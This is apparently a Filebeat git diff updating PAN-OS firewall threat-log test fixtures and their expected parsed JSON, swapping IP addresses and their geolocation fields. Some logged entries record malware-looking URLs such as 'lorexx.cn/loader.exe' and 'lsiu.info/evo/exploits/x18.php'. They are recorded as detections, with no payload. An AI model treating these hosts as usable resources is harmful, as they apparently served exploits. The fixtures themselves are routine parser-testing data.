+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,216.160.83.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,67.43.156.14,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,89.160.20.156,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json
index 3d3f6013ebd1..58ba2c93b7ce 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json
@@ -4,19 +4,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59309,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -27,7 +23,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -41,7 +37,7 @@
         "log.level": "informational",
         "log.offset": 0,
         "network.application": "web-browsing",
-        "network.community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=",
+        "network.community_id": "1:tf34cPo413Ta9avfHZIP6b5DHXc=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -76,13 +72,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -105,19 +101,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59313,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -128,7 +120,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -140,9 +132,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 403,
+        "log.offset": 401,
         "network.application": "web-browsing",
-        "network.community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=",
+        "network.community_id": "1:q5WSywQz9mnveJuMrWqG0rlBf3g=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -177,13 +169,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -207,19 +199,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59314,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -230,7 +218,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -242,9 +230,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 813,
+        "log.offset": 809,
         "network.application": "web-browsing",
-        "network.community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=",
+        "network.community_id": "1:6ykXrYnnXhC2OTYegSkf7HauF6Y=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -279,13 +267,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -309,19 +297,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59315,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -332,7 +316,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -344,9 +328,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 1223,
+        "log.offset": 1217,
         "network.application": "web-browsing",
-        "network.community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=",
+        "network.community_id": "1:ymK/qi8Fj5E3NiB4Zt+MtiJFOHI=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -381,13 +365,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -411,19 +395,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59316,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -434,7 +414,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -446,9 +426,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 1633,
+        "log.offset": 1625,
         "network.application": "web-browsing",
-        "network.community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=",
+        "network.community_id": "1:R89M2kJolrp3Qf6IPm++vTcewQU=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -483,13 +463,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -513,19 +493,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59317,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -536,7 +512,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
